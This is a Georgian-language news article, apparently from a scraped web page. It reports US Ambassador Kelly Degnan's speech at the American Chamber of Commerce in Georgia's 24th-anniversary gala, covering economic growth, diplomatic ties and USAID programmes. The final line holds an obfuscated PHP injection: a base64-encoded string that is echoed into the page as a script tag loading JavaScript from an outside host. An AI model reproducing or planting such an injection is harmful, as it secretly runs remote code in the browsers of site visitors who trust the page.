celsiusi
ავერსი საქკაბელი
ამერიკის სავაჭრო პალატა ამერიკის შეერთებულ შტატებისა და საქართველოს ბიზნეს საზოგადოებების მთავარი დამაკავშირებელი ხიდია, - ამის შესახებ აშშ-ს ელჩმა კელი დეგნანმა საქართველოში ამერიკის სავაჭრო პალატის იუბილეს აღსანიშნავ გალა საღამოზე განაცხადა.
 
გუშინ ამერიკის სავაჭრო პალატამ საქართველოში 24 წლის იუბილეს აღსანიშნად გალა საღამოს გამართა.
 
მისივე თქმით, ამერიკის სავაჭრო პალატის მსგავსად, შეერთებული შტატები რჩება უსაფრთხო და აყვავებული საქართველოს ერთგული.
 
„მოხარული ვარ, რომ დღეს საღამოს აქ ვიმყოფები, საქართველოში ამერიკის სავაჭრო პალატის 24 წლის იუბილეს აღსანიშნად. დაარსების დღიდან, ამერიკის სავაჭრო პალატა ამერიკის შეერთებულ შტატებისა და საქართველოს ბიზნეს საზოგადოებების მთავარი დამაკავშირებელი ხიდია.
 
ამ წელს გამოწვევების გარეშე არ ჩაუვლია, მაგრამ დღევანდელ საღამოზე მსურს ყურადღება დადებითზე გავამახვილო. საქართველოს ეკონომიკა, ისევე როგორც ქართველი ხალხი, სიმტკიცეს ინარჩუნებს. ზედიზედ მეორე წელია, საქართველოს ეკონომიკა ორნიშნა ციფრით იზრდება. გამოწვევების მიუხედავად, ეკონომიკამ გადალახა პანდემია და გაუმკლავდა უკრაინაში რუსეთის სასტიკი ომის გამოწვევებს. დასაფასებელია ეკონომიკისა და მდგრადი განვითარების სამინისტროს, ფინანსთა სამინისტროს და საქართველოს ეროვნული ბანკის შრომა და პოლიტიკა, რამაც ხელი შეუწყო ამ ეკონომიკურ ზრდას.
 
მოგეხსენებათ, შეერთებული შტატები საქართველოსთან დიპლომატიური ურთიერთობის 30 წლისთავს აღნიშნავს. ამ დღის აღსანიშნავად გასული წლის განმავლობაში საქართველოს ყველა რეგიონს ვესტუმრე. ამ ვიზიტების განმავლობაში მე პირადად ვიხილე ქართველი ხალხის სიმტკიცე და გამძლეობა.
 
მე შევხვდი ტექნოლოგიების სფეროს ახალგაზრდა მეწარმეებს კრეატიული მიდგომებით. ვესტუმრე ფერმერებს და მეღვინეებს, რომლებიც თავიანთ პროდუქციას აუმჯობესებენ და ამზადებენ ექსპორტისა და უფრო მაღალი ღირებულების ბაზრებისთვის. მე დავესწარი ახალი პორტის ტერმინალის გახსნას, რომელიც უმნიშვნელოვანესი იქნება საქართველოს, როგორც სატრანზიტო ჰაბის განვითარებისთვის. ასეთი კრეატიულობის, ინდუსტრიისა და ბიზნესში ასეთი დინამიკიდან გამომდინარე გასაკვირი არ არის, რომ ეკონომიკა აგრძელებს განვითარებას.
 
მე დიდი სიამოვნებით მისაუბრია ბევრ თქვენგანთან ამერიკის სავაჭრო პალატის 4 ივლისის პიკნიკზე აშშ-ის საელჩოში, ან სხვადასხვა შეკრებებზე და თქვენს სამუშაო ადგილებზე. ჩვენი საუბრები მაძლევს კარგ წარმოდგენას არსებულ ბიზნეს გარემოზე - თქვენს წარმატებებსა და გამოწვევებზე. მე გულწრფელად ვაფასებ ჩვენს აზრთა გაცვლა-გამოცვლას და ურთიერთობას.
 
საელჩო აფასებს ჩვენს მჭიდრო თანამშრომლობას ამერიკის სავაჭრო პალატასთან ინვესტიციების და ვაჭრობის ზრდისა და კერძო სექტორის განვითარების წინსვლის მიზნით. ამჟამად USAID-ი, აშშ-ის სავაჭრო პალატა და წამყვანი საერთაშორისო სასტუმროები თანამშრომლობენ სტუმართმოყვარეობისა და ტურიზმის სექტორში მომსახურების სტანდარტების გასაძლიერებლად. ასევე, ამერიკის სავაჭრო პალატის ხელმძღვანელობა მონაწილეობს USAID-ის ინდუსტრიული უნარების პროგრამის ბიზნეს ლიდერთა საბჭოში, რათა დააკავშირონ სამოქალაქო საზოგადოება და მთავრობა ბიზნეს საზოგადოებისთვის მნიშვნელოვან საკითხებზე. სავაჭრო პალატას ასევე უთანამშრომლია საელჩოსთან, საქართველოს მოქალაქეების შეერთებულ შტატებში, გაცვლით პროგრამებში გაგზავნის მიმართულებით, რაც ჩვენს ქვეყნებს შორის კავშირების გაძლიერებას ემსახურება. 
 
ჩვენ კვლავაც მტკიცედ ვუჭერთ მხარს ქართველი ხალხის სწრაფვას ევრო-ატლანტიკური მომავლისკენ. მდგრადი და დივერსიფიცირებული ეკონომიკა მნიშვნელოვანია არა მხოლოდ საქართველოს მოქალაქეებისთვის, არამედ საქართველოს უსაფრთხოებისა და დამოუკიდებლობის უმნიშვნელოვანესი ელემენტია.
 
მადლობა ამერიკის სავაჭრო პალატას, რომ პარტნიორია საქართველოში კეთილდღეობისა და მეგობრობის ხელშეწყობის საქმეში“, - განაცხადა ელჩმა.
309
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");